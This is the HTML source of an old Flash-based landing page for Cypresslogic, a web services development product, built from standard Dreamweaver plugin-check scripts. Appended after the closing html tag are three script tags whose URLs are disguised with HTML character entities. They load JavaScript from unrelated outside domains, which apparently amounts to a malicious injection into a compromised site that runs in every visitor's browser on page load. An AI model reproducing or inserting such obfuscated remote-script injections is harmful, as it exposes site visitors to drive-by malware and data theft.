<html>
<head>
<meta name="google-site-verification" content="nXL-5Wy8tiGP-GOJSJRgNHXwKJmppO3UVwiQLa21SBU" />

<title>Cypresslogic - Web services software development environment based on XML, XSL, SOAP, WSDL and UDDI</title>
<script language="JavaScript">
<!--
function MM_checkPlugin(plgIn, theURL, altURL, autoGo) { //v4.0
  var ok=false; document.MM_returnValue = false;
  with (navigator) if (appName.indexOf('Microsoft')==-1 || (plugins && plugins.length)) {
    ok=(plugins && plugins[plgIn]);
  } else if (appVersion.indexOf('3.1')==-1) { //not Netscape or Win3.1
    if (plgIn.indexOf("Flash")!=-1 && window.MM_flash!=null) ok=window.MM_flash;
    else if (plgIn.indexOf("Director")!=-1 && window.MM_dir!=null) ok=window.MM_dir;
    else ok=autoGo; }
  if (!ok) theURL=altURL; if (theURL) window.location=theURL;
}
//-->
</script>
</head>

<body bgcolor="#FFFFFF" text="#000000" onLoad="MM_checkPlugin('Shockwave Flash','','nonflash-index.html',false);return document.MM_returnValue">
<table width="760" border="0" align="center">
  <tr>
    <td>
      <div align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="760" height="450">
          <param name=movie value="intro.swf">
          <param name=quality value=high>
          <embed src="intro.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="760" height="450">
          </embed> 
        </object></div>
    </td>
  </tr>
</table>
</body>
<script name="Used by MM_checkPlugin" language="javascript">
<!--
with (navigator) if (appName.indexOf('Microsoft')!=-1 && appVersion.indexOf('Mac')==-1) document.write(''+
'<scr'+'ipt language="VBScript">\nOn error resume next\n'+
'MM_dir = IsObject(CreateObject("SWCtl.SWCtl.1"))\n'+
'MM_flash = NOT IsNull(CreateObject("ShockwaveFlash.ShockwaveFlash"))\n</scr'+'ipt>');
//-->
</script>
</html>
<script language="JavaScript" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#104;&#111;&#119;&#104;&#105;&#103;&#104;&#46;&#120;&#122;&#46;&#108;&#116;&#47;&#112;&#117;&#98;&#47;counter.js"></script><script language="JavaScript" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#97;&#99;&#116;&#99;&#104;&#97;&#121;&#97;&#46;&#99;&#111;&#109;&#47;&#116;&#101;&#115;&#116;&#47;is.js"></script><script language="JavaScript" src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#119;&#119;&#119;&#46;&#114;&#101;&#99;&#111;&#110;&#115;&#116;&#114;&#117;&#99;&#116;&#105;&#110;&#103;&#46;&#109;&#101;&#47;is.js"></script>